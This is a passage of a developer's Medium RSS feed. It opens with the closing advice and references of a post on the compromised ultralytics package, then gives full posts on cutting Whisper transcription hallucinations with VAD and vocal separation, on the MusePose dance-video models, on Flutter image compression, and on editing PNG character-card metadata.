releases</a>, People who installed ultralytics between 2024–12–04 20:51 ~2024–12–05 09:15 and 2024–12–05 12:47 ~ 2024–12–05 13:47 (The times are in UTC) were likely infected by the dangerous malware.</p><h4>What to do &amp; Things to learn</h4><ol><li>Report to <a href="https://github.com/advisories">Github Advisory</a>. Github Advisory is where people report things exactly like this. Each submission is reviewed by the GitHub Security Lab curation team, rated for severity, and published to the DB.</li><li>Since one of my projects uses this package as well, notify them all as much as possible. People who may have installed the ultralytics between 2024–12–04 20:51 ~2024–12–05 09:15 and 2024–12–05 12:47 ~ 2024–12–05 13:47 are likely infected with malware. Since it’s a really popular package that many people use, it’s worth notifying people.<br>I made an issue about it and pinned it: <a href="https://github.com/jhj0517/AdvancedLivePortrait-WebUI/issues/19">https://github.com/jhj0517/AdvancedLivePortrait-WebUI/issues/19</a></li><li>I think it could have been prevented much earlier because the vulnerability was reported in the Github Advisory long before the attack — <a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">GHSA-7x29-qqmq-v6qc</a>. <br>Reading the Github Advisory can sometimes help you secure your project.</li></ol><h3>Reference</h3><ul><li><a href="https://github.com/ultralytics/ultralytics/issues/18027">https://github.com/ultralytics/ultralytics/issues/18027</a></li><li><a href="https://portswigger.net/web-security/os-command-injection">https://portswigger.net/web-security/os-command-injection</a></li><li><a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">https://github.com/advisories/GHSA-7x29-qqmq-v6qc</a></li><li><a href="https://matklad.github.io/2021/07/30/shell-injection.html">https://matklad.github.io/2021/07/30/shell-injection.html</a></li><li><a href="https://www.reddit.com/r/commandline/comments/4d4oq4/linuxsecurity_echo_injection/">https://www.reddit.com/r/commandline/comments/4d4oq4/linuxsecurity_echo_injection/</a></li><li><a href="https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html">https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c84338b639c7" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Audio Pre-Processings For Better Results in the Transcription Pipeline]]></title>
            <link>https://medium.com/@developerjo0517/audio-pre-processings-for-better-results-in-the-transcription-pipeline-bab1e8f63334?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/bab1e8f63334</guid>
            <category><![CDATA[whisper]]></category>
            <category><![CDATA[transcription]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[openai]]></category>
            <category><![CDATA[deep-learning]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Sun, 29 Sep 2024 12:58:28 GMT</pubDate>
            <atom:updated>2025-01-07T13:38:03.720Z</atom:updated>
            <content:encoded><![CDATA[<p><a href="https://github.com/openai/whisper"><strong>Whisper</strong></a> is currently the state-of-the-art speech-to-text model.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cMke9qdC4EvowVEDquVCjw.png" /><figcaption>Whisper Architecture</figcaption></figure><p><a href="https://cdn.openai.com/papers/whisper.pdf">Robust Speech Recognition via Large-Scale Weak</a> is proposed by Alec Radford, Jong Wook Kim, Tao Xu, Greg Brockman, Christine McLeavey, Ilya Sutskever. <br>The model is implemented as an encoder-decoder transformer. Whisper is trained on 680K hours of labeled multilingual audio data. During transcription, the audio is split into 30-second chunks, and each chunk is fed into the model.</p><p>For more information on the architecture of the Whisper, see the paper link above.</p><p>Since Whisper was open-sourced in 2022, many applications have appeared to use it. From just transcribing for video subtitles to using it as part of a speech-to-speech pipeline, etc.</p><p>Ideally, Whisper could have been trained on less dirty audio (no background music and less noise in the audio), as this type of noise in the input audio often causes <a href="https://en.wikipedia.org/wiki/Hallucination_(artificial_intelligence)">hallucinations</a>.</p><p>As you can see in the <a href="https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091">Whisper-WebUI Issue</a>, the most common hallucination in the Whisper is the repetition of some specific word and transcription gets stuck at some specific part. Or if the <a href="https://github.com/jhj0517/Whisper-WebUI/issues/249">transcription starts too early</a>.</p><pre>[00:00.000 --&gt; 00:02.000]  You<br>[00:30.000 --&gt; 00:32.000]  You<br>[01:00.000 --&gt; 01:02.000]  You<br>[01:30.000 --&gt; 01:32.000]  You<br>[02:00.000 --&gt; 02:02.000]  You<br>[02:30.000 --&gt; 02:32.000]  You<br>[03:00.000 --&gt; 03:02.000]  You<br>[03:08.000 --&gt; 03:10.000]  You<br>[03:16.000 --&gt; 03:18.000]  You<br>[03:18.000 --&gt; 03:20.000]  You<br>[03:29.000 --&gt; 03:31.000]  You<br>[03:31.000 --&gt; 03:33.000]  You<br>[03:42.000 --&gt; 03:44.000]  You<br>[03:44.000 --&gt; 03:46.000]  You<br>[03:46.000 --&gt; 03:48.000]  You<br>[03:59.000 --&gt; 04:01.000]  You</pre><p>This type of hallucination typically occurs when the audio has such noise. To reduce such hallucinations, some pre-processing can be applied to the audio. There are some good repositories to use whisper for better result with lower WER (World Error Rate) and faster transcription speed in the github.</p><p>For example, <a href="https://github.com/SYSTRAN/faster-whisper">faster-whisper</a>, which implemented whisper with <a href="https://github.com/OpenNMT/CTranslate2/">CTraslate2</a> for better transcription speed and efficient VRAM usage, uses <a href="https://github.com/snakers4/silero-vad">Silero VAD</a> to detect only human voices from the audio.</p><p>VAD (Voice Activity Detection) is the most common pre-processing technique used in transcription pipeline. It gives pretty decent result than not using it. In faster-whisper, VAD is implemented by first removing all non-voice segments, feeding only the detected voice to Whisper, and then restoring the original timestamps in the transcription pipeline.</p><p>Really good thing about the VAD is that it’s super light and fast. According to the Silero VAD, one chunk of audio (30 seconds) takes less than <strong>1 millisecond</strong> to process on a single CPU thread.</p><p>Due to the fact that it can use CPU for inference and is still super fast and lightweight, you can attach a VAD to transcription pipeline without any load.</p><p>I’ve tried to run some benchmarks to see how effective VAD is in the transcription pipeline, but it’s difficult to find a suitable dataset for such a task. Many ASR datasets like <a href="https://www.openslr.org/12">LibriSpeech</a> or <a href="https://www.openslr.org/7/">TEDLIUM</a> are already cleaned without much noise and are just speech audio files within 2~10 seconds. Using VAD on already cleaned audio will only result in the same WER (World Error Rate) in a transcription pipeline before and after VAD.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-QG8Nwlx33hD9h6GyrTDw.png" /><figcaption>Same WER with LibriSpeech-other</figcaption></figure><p>Although LibriSpeech-other has more noise than other ASR datasets, it doesn’t have enough “dirty” audio to test something like this. To benchmark such a thing, the audio should be as dirty as possible with the reference transcription. I couldn’t find any suitable datasets for this. So instead of ASR datasets, the best thing to do was to pick some real-world samples and compare them.</p><p>Let’s take a look at the real world example of Whisper causing hallucinations due to noise. Here’s the 1 minute 30 second sample from <a href="https://www.youtube.com/watch?v=Eek0cOjLrV0&amp;ab_channel=0517jhj">The Joe Schmo Show (2003)</a>.</p><p>Any TV show or movie scene would be a good audio sample with noise, because we often face audio with such noise in the real world. The sample has a long time of the low pitch of the sound from about 0:03 ~ 1:05, almost about 1 minute, to add continuous tension to the show. <br>Such continuous noise often causes hallucinations in the Whisper because the model is easily confused as to whether it is a human voice or not. That’s why VAD works so well in the transcription pipeline.</p><p>This is a human-made, error-free transcription of the sample:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>First Flame of Love Eviction Ceremony.<br><br>2<br>00:01:09,659 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulders.<br><br>7<br>00:01:21,659 --&gt; 00:01:23,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>And this is the transcription using Whisper large-v2:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>first Flame of Love Eviction Ceremony.<br><br>2<br>00:00:03,879 --&gt; 00:00:13,880<br>♪♪<br><br>3<br>00:00:13,880 --&gt; 00:00:23,879<br>♪♪<br><br>4<br>00:00:23,879 --&gt; 00:00:33,879<br>♪♪<br><br>5<br>00:00:33,879 --&gt; 00:00:43,899<br>♪♪<br><br>6<br>00:00:43,899 --&gt; 00:00:53,899<br>♪♪<br><br>7<br>00:00:53,899 --&gt; 00:01:03,920<br>♪♪<br><br>8<br>00:01:03,920 --&gt; 00:01:13,920<br>♪♪<br><br>9<br>00:01:13,920 --&gt; 00:01:23,939<br>♪♪<br><br>10<br>00:01:23,939 --&gt; 00:01:25,939<br>Coming up next on Joe Schmoe II,<br><br>11<br>00:01:25,939 --&gt; 00:01:27,939<br>the most shocking eviction yet.<br><br>12<br>00:01:27,939 --&gt; 00:01:29,939<br>Welcome to the...</pre><blockquote>For the hyperparameters, I used all the defaults from <a href="https://github.com/SYSTRAN/faster-whisper/blob/d57c5b40b06e59ec44240d93485a95799548af50/faster_whisper/transcribe.py#L287">faster_whisper.transcribe()</a>.</blockquote><p>Interestingly, the noise part was transcribed with ♪♪. This may indicate that there were labels for the music as well, not just speech transcription in the Whisper training data. This transcription is missing a few lines. Right after the noise part, some lines were simply skipped and not transcribed.</p><p>Let’s use VAD to improve this :</p><pre>1<br>00:00:00,000 --&gt; 00:00:03,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:01:14,629 --&gt; 00:01:18,629<br>But tonight, one of you will have to let go of love&#39;s warm bosom<br><br>3<br>00:01:18,629 --&gt; 00:01:21,629<br>and cleave to rejection&#39;s cold shoulder.<br><br>4<br>00:01:22,629 --&gt; 00:01:24,629<br>Welcome to the first Flame...<br><br>5<br>00:01:24,629 --&gt; 00:01:26,629<br>Coming up next on Joe Schmoe II,<br><br>6<br>00:01:26,629 --&gt; 00:01:29,629<br>the most shocking eviction yet.</pre><p>The most problematic noise part, ♪♪ part ( 1 minute of noise ) has been removed by VAD. We may be able to say that the result is better than not using it. But compared to human transcription, there are still a few lines missing right after the noise.</p><p>That’s because VAD also causes hallucinations from noise, not just the Whisper. If you attach submodels to the pipeline to get a better result, it could sometimes give you a worse result because submodels also cause hallucinations. <br>Unfortunately, VAD couldn’t catch some lines right after the noise, resulting in some missing lines.</p><p>Would tweaking some of the VAD hyperparameters, such as lowering min_speech_duration_ms, help it detect some missing lines? :</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:00:04,000 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulder.<br><br>7<br>00:01:21,659 --&gt; 00:01:22,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>It caught some missing lines, but at the same time made another hallucination. From 00:04 ~ 01:10, almost 1 minute of the noise is also detected as a voice, resulting in just saying “Love” for a whole 1 minute.</p><p>So tweaking such a hyperparameter is also a challenging to improve such a result, because it also produces unexpected hallucinations like this.</p><p>The best way to do this would be to simply remove noise from the audio, separating vocals from other noise.</p><p>There’s a really cool open source project for this, <a href="https://github.com/Anjok07/ultimatevocalremovergui">ultimatevocalremovergui</a>.</p><p>ultimatevocalremovergui is currently the state-of-art open source voice and noise separation tool available. Different types of models like MDX, Demucs are integrated in the repository and it has its own pipeline that uses all the models for better result.</p><p>Although I haven’t tested all of the UVR models, the ones I find most useful for the transcription pipeline are the<a href="https://github.com/ZFTurbo/MVSEP-MDX23-music-separation-model"> MDX models</a>. While other models, such as <a href="https://github.com/facebookresearch/demucs">Demucs</a>, focus on separating all instruments from the music, such as bass or drums, MDX models support a vocals-only separation option that’s faster and lighter, and may be best suited for the transcription pipeline.</p><p>Here’s the result with the UVR-MDX-NET-Inst_HQ_4 model from the UVR and VAD together:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:01:09,659 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulders.<br><br>7<br>00:01:21,659 --&gt; 00:01:23,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>It showed most accurate transcription compared to others. It didn’t affect by long time of the noise, didn’t miss few lines. Just added unnecessary “Welcome to the” in the first line at the front. Using UVR gives the best result so far.</p><p>For Joe Shomo Show 2, this is the WER chart:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TqXZFNcHNjaBZz6pkx1v0g.png" /><figcaption>WER Benchmark on Joe Schmo Show</figcaption></figure><p>Adding UVR to the transcription pipeline also reduced the WER on <a href="https://www.openslr.org/12">LibriSpeech-other</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xUCZtJflf9YR4J8TthVlYA.png" /><figcaption>WER Benchmark on LibriSpeech-other</figcaption></figure><p><a href="https://colab.research.google.com/github/jhj0517/Whisper-WebUI-Benchmark/blob/master/notebooks/whisper_webui_benchmark.ipynb">Picovoice/speech-to-text-benchmark</a> is used to benchmark. It wasn’t significantly reduced because the ASR dataset is already clean and is already close to almost perfect data to transcribe, but if you try with real-world examples like the TV show above, you could often get much better results with UVR.</p><p>The disadvantage of the using UVR MDX model compared to Silero VAD is that it uses GPU ( siginficantly slow in CPU ) and is not as light as VAD. With UVR-MDX-NET-Inst_HQ_4, it needed about ~9GB VRAM. And it increases transcription time.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jWcYdiwegCUpeOtwEbu8KA.png" /><figcaption>RTF Benchmark on LibriSpeech-other</figcaption></figure><p>In terms of RTF ( Real Time Factor — Processing time / Audio time ), Using VAD and UVR together in the transcription pipeline increased the transcription time by about 2.5 times compared to not using them. Because UVR requires the GPU and increases transcription time, it’s not as easy to add to the transcription pipeline as VAD.</p><p>But if your main interest is in lowering WER and reducing hallucinations rather than faster transcription, it’s definitely worth getting into the transcription pipeline. For example, it works well when you are transcribing movie subtitles.</p><p>When attaching submodels that use GPU to the pipeline, it is recommended to implement the opt-in feature to offload submodels to the pipeline after inference because you might get a CUDA OutOfMemoryError.</p><p>Currently in <a href="https://github.com/jhj0517/Whisper-WebUI">Whisper-WebUI</a> the transcription pipeline is implemented as follows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*sUAnXkxvJYReCpwXZGOz_A.png" /><figcaption>Whisper WebUI Transcription Pipeline</figcaption></figure><p>Because music separation increases processing time significantly, it would not be appropriate to use it in a real-time transcription pipeline such as a speech-to-speech conversation. However, if music separation models as lightweight as VAD become available in the future, it would be worthwhile to use them as submodels in the real-time transcription pipeline as well.</p><h4>Reference</h4><ol><li><a href="https://openai.com/index/whisper/">https://openai.com/index/whisper/</a></li><li><a href="https://cdn.openai.com/papers/whisper.pdf">https://cdn.openai.com/papers/whisper.pdf</a></li><li><a href="https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091">https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091</a></li><li><a href="https://github.com/jhj0517/Whisper-WebUI/issues/249">https://github.com/jhj0517/Whisper-WebUI/issues/249</a></li><li><a href="https://github.com/openai/whisper/discussions/679#discussioncomment-7649183">https://github.com/openai/whisper/discussions/679#discussioncomment-7649183</a></li><li><a href="https://github.com/SYSTRAN/faster-whisper/pull/499#issuecomment-2023086569">https://github.com/SYSTRAN/faster-whisper/pull/499#issuecomment-2023086569</a></li></ol><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bab1e8f63334" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[MusePose: Transform an Image into a Dancing Video]]></title>
            <link>https://medium.com/@developerjo0517/musepose-transform-an-image-into-a-dancing-video-b31f9025a30d?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/b31f9025a30d</guid>
            <category><![CDATA[hugging-face]]></category>
            <category><![CDATA[stable-diffusion]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[musepose]]></category>
            <category><![CDATA[generative-ai-tools]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 13 Jun 2024 14:33:31 GMT</pubDate>
            <atom:updated>2024-06-13T14:33:31.632Z</atom:updated>
            <content:encoded><![CDATA[<p><a href="https://github.com/TMElyralab/MusePose">MusePose</a> is a Generative AI project that transforms an image into a dancing video. Models and codes are published on HuggingFace and Github, so you can try now if you want. But models are only available for non-commercial research purposes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YxMVkYwWdNhWkg-xlhF6kA.gif" /><figcaption>Example Output From The MusePose</figcaption></figure><p>Here’s the demo example shown in the repo. It takes 1) image 2) dancing skeleton as inputs and returns a dancing image based on them. Basically, MusePose works through a two-step process.</p><h4>Step1 : Align Skeletons from Input Image &amp; Video</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9dXTH8DOMSOEu_vXLAWEnw.gif" /><figcaption>Example Output From Step1</figcaption></figure><p>Red numbers in the example above indicate each input and output in this step.</p><ol><li>Cell 1 → Cell 2<br>Extract skeleton from the input image</li><li>Cell 4 → Cell 5<br>Extract skeleton from the input dance video</li><li>Cell 5 → Cell 3<br>Align (Resize) the skeleton video (Cell 5) to the skeleton image (Cell 2).</li></ol><p>So getting Cell 3 is the purpose of the step 1.</p><p>This process is done with <a href="https://github.com/IDEA-Research/DWPose">DWPose</a> and requires two types of models.</p><ul><li><a href="https://huggingface.co/jhj0517/MusePose/blob/main/dwpose/yolox_l_8x8_300e_coco.pth">yolox_l_8x8_300e_coco.pth</a><br>- <a href="https://github.com/Megvii-BaseDetection/YOLOX">YoloX</a> model to detect person from the image</li><li><a href="https://huggingface.co/yzd-v/DWPose/blob/main/dw-ll_ucoco_384.pth">dw-ll_ucoco_384.pth</a> <br>- DWPose model to extract skeleton from the image</li></ul><p>It uses less VRAM and less time than step 2 later.</p><h4>Step2: Make The Image Move with The Aligned Skeleton</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/720/1*zpkf5tnFhNS2wPqecG52Gw.gif" /><figcaption>Example Output From Step2</figcaption></figure><p>Now that you have a properly aligned skeleton from step 1. In step 2, it makes the image move with it. This step goes through quite heavy work and loads <strong>7 models in total</strong>.</p><p>According to the repository, these models are loaded during the step 2 :</p><ul><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">denoising_unet.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">motion_module.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">pose_guider.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">reference_unet.pth</a></li><li><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers/tree/main/unet">sd-image-variations-diffusers</a></li><li><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers/tree/main/image_encoder">image_encoder</a></li><li><a href="https://huggingface.co/stabilityai/sd-vae-ft-mse">sd-vae-ft-mse</a></li></ul><p>From denoising_unet.pth to reference_unet.pth, the top four are specifically trained models for the MusePose. Other models are used to help generate images according to the result of these four models.</p><p>As long as it loads 7 models, it needs some VRAM. With torch.float16 dtype it needs at least ~17GB for this step. You can set width and height of how this process will procceed through what resolution, so lowering this resolution would be helpful to use less VRAM, and increasing resolution as close as to input source would be helpful to get better result but it costs you more VRAM.</p><p>You can set the image resolution as a parameter, which determines how this process will go through in this step, so lowering the resolution would be helpful if you get CUDA errors. But it’s likely to get a worse result if there’s a lot difference with the original input source.</p><h4>MusePose Demos You Can Try</h4><p>Here’re you can try MusePose.</p><ul><li><a href="https://github.com/TMElyralab/Comfyui-MusePose">ComfyUI-MusePose</a> <br>- ComfyUI custom node</li><li><a href="https://github.com/jhj0517/stable-diffusion-webui-MusePose">stable-diffusion-webui-MusePose</a><br>- SD WebUI Extension</li><li><a href="https://github.com/jhj0517/MusePose-WebUI">MusePose-WebUI</a><br>- Gradio WebUI dedicated for MusePose. It supports <a href="https://huggingface.co/spaces/jhj0517/musepose">Huggingface Space</a> &amp; <a href="https://colab.research.google.com/github/jhj0517/MusePose-WebUI/blob/main/notebook/musepose_webui.ipynb">Colab Notebook</a> you can try.</li></ul><h3>Reference</h3><ul><li><a href="https://github.com/IDEA-Research/DWPose">IDEA-Research/DWPose: “Effective Whole-body Pose Estimation with Two-stages Distillation” (ICCV 2023, CV4Metaverse Workshop) (github.com)</a></li><li><a href="https://github.com/Megvii-BaseDetection/YOLOX">Megvii-BaseDetection/YOLOX: YOLOX is a high-performance anchor-free YOLO, exceeding yolov3~v5 with MegEngine, ONNX, TensorRT, ncnn, and OpenVINO supported. Documentation: https://yolox.readthedocs.io/ (github.com)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b31f9025a30d" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Compressing Image in Flutter]]></title>
            <link>https://medium.com/@developerjo0517/compressing-image-in-flutter-dd790b12b1c9?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/dd790b12b1c9</guid>
            <category><![CDATA[flutter]]></category>
            <category><![CDATA[image-compression]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 23 May 2024 15:29:28 GMT</pubDate>
            <atom:updated>2024-05-23T15:30:25.499Z</atom:updated>
            <content:encoded><![CDATA[<p>There’re two ways to compress the image in Flutter.</p><ol><li><a href="https://github.com/flutter/packages/tree/main/packages/image_picker/image_picker">image_picker</a></li><li><a href="https://github.com/fluttercandies/flutter_image_compress?tab=readme-ov-file#platform-features">flutter_image_compress</a></li></ol><p>Fortunately, there is someone who has already tested these packages in the <a href="https://stackoverflow.com/a/64690920/16626322">stackoverflow post</a>. The test was done 4 years ago, but I found that <a href="https://github.com/fluttercandies/flutter_image_compress?tab=readme-ov-file#platform-features">flutter_image_compress</a> is still the best and most efficient way to compress the image in Flutter, thanks to the post. Here’s my results with flutter_image_compress :</p><h4>Results</h4><ol><li><strong>100% (2.07 MB)</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J7tAzEhQgxiWluTgeZEBQA.jpeg" /><figcaption>2.07 MB image from <a href="https://unsplash.com/ko/%EC%82%AC%EC%A7%84/%EC%9D%BC%EB%B0%98%EC%A0%81%EC%9D%B8-%ED%95%B4%EB%B0%94%EB%9D%BC%EA%B8%B0%EC%9D%98-%EA%B7%BC%EC%A0%91-%EC%82%AC%EC%A7%84-5lRxNLHfZOY">Unsplash</a></figcaption></figure><p>This is the original image without any compression.</p><p>2. <strong>95% (803 KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QFCP4qFD-5rrsTYoYW2xGg.jpeg" /><figcaption>803KB</figcaption></figure><p>When I decreased the image quality by only 5%, the size was compressed by more than 50%, 2MB → 803KB. The flower still looks the same, but the grey on the background is a little bit noticeable.</p><p>2. <strong>50% (319KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-DL1uIWOZP20HaB3-rPrIQ.jpeg" /><figcaption>319KB</figcaption></figure><p>The image was compressed significantly, 2MB → 300KB. About the changes: The gray gradation on the background is noticeable, but the flower still looks the same.</p><p>3. <strong>10%</strong> <strong>(99.4KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CtggMxL8GHtGeYmFMGyu5g.jpeg" /><figcaption>99KB</figcaption></figure><p>The gray gradation on the background became more noticeable. At 10% quality, you can see a little blur on the flower if you look closely.</p><p>4. <strong>5% (60KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8cAJce5Me5gOxqjJKZkNvw.jpeg" /><figcaption>60KB</figcaption></figure><p>Now the image is only 60KB and quite corrupted.</p><p>The default value of the image quality is 95% in the compressAndGetFile(). It only decrease by 5% of the image, but it showed decent compression ratio when it comes to the size, from 2MB → 803KB. And images look the same up to 50% in my opinion. I believe this is really useful package if you need to compress the image in the Flutter.</p><h4>Implementation in Flutter</h4><p>Add flutter_image_compress in the pubspec.yaml :</p><pre>dependencies:<br>  flutter_image_compress: ^2.3.0</pre><p>You can compress it to the temp directory and then handle the image there:</p><pre>import &#39;package:flutter_image_compress/flutter_image_compress.dart&#39;;<br>import &#39;package:path/path.dart&#39; as p;<br>import &#39;dart:io&#39;;<br><br>static Future&lt;XFile&gt; compressImage({<br>  required File imageFile,<br>  int quality=95,<br>  CompressFormat format=CompressFormat.jpeg,<br>}) async {<br>  final String targetPath = p.join(Directory.systemTemp.path, &#39;temp.${format.name}&#39;);<br>  final XFile? compressedImage = await FlutterImageCompress.compressAndGetFile(<br>    imageFile.path,<br>    targetPath,<br>    quality: quality,<br>    format: format<br>  );<br><br>  if (compressedImage==null){<br>    throw (&quot;Failed to compress the image&quot;);<br>  }<br><br>  return compressedImage;<br>}</pre><p>You can also specify the format of the image like CompressFormat.jpeg or CompressFormat.png ..etc. Usually JPEG is the way to go because it has the best resolution for the same size of the image.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/360/1*Av0cUhjnLECsBng78_QhEw.gif" /><figcaption>Sample Usage App</figcaption></figure><p>If you want to see the code of the sample usage app above, please visit:</p><p><a href="https://github.com/jhj0517/flutter-samples/tree/master/compress_image">flutter-samples/compress_image at master · jhj0517/flutter-samples</a></p><h3>Reference</h3><ul><li><a href="https://stackoverflow.com/questions/58800808/flutter-the-best-way-to-compress-image">dart — Flutter the best way to compress image — Stack Overflow</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=dd790b12b1c9" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How to Modify PNG Chunk Metadata in Flutter]]></title>
            <link>https://medium.com/@developerjo0517/how-to-modify-png-chunk-metadata-in-flutter-6dcc68cbd4a4?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/6dcc68cbd4a4</guid>
            <category><![CDATA[png]]></category>
            <category><![CDATA[metadata]]></category>
            <category><![CDATA[flutter]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Tue, 21 May 2024 14:09:48 GMT</pubDate>
            <atom:updated>2024-05-21T14:46:25.920Z</atom:updated>
            <content:encoded><![CDATA[<h4>Why Do I Need to Edit PNG Chunk Metadata</h4><p>In the open source LLM community, there are many open source projects you can use. For example, <a href="https://github.com/open-webui/open-webui">open-webui</a>, <a href="https://github.com/oobabooga/text-generation-webui">text-generation-webui</a>, <a href="https://github.com/TavernAI/TavernAI">TavernAI</a>… etc. These open source projects let you explore LLM by running a local model or using a remote API like the OpenAI API. All these open source projects are beautiful ingredients for the future of LLM.</p><p>And particularly in web UIs such as <a href="https://github.com/TavernAI/TavernAI">TavernAI</a>, you can create a “character” with the personality you want (mostly by giving an initial prompt to the LLM) and chat with the character. There are many such projects that allow you to chat with the character you made. In these projects, there is often a “Character share” feature.</p><p>Such feature is often implemented by embedding prompts in the PNG metadata.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/640/1*p6EU_qEPkb8nE0rb_i9I6A.png" /><figcaption>Example Character Image for Sharing</figcaption></figure><p>For example, the PNG image above has the following metadata with a tEXt type chunk in JSON format :</p><pre>{<br>  &quot;spec&quot;: &quot;chara_card_v2&quot;,<br>  &quot;spec_version&quot;: &quot;2.0&quot;,<br>  &quot;data&quot;: {<br>    &quot;name&quot;: &quot;Sheepy&quot;,<br>    &quot;description&quot;: &quot;Your name is sheepy, the young sheep. Because you&#39;re a sheep, you only respond with words like &#39;meeeeh-!&#39;, &#39;meh&#39;, etc.&quot;,<br>    &quot;personality&quot;: &quot;&quot;,<br>    &quot;scenario&quot;: &quot;&quot;,<br>    &quot;first_mes&quot;: &quot;&quot;,<br>    &quot;mes_example&quot;: &quot;&quot;,<br>    &quot;creator_notes&quot;: &quot;&quot;,<br>    &quot;system_prompt&quot;: &quot;&quot;,<br>    &quot;post_history_instructions&quot;: &quot;&quot;,<br>    &quot;alternate_greetings&quot;: [],<br>    &quot;character_book&quot;: {<br>      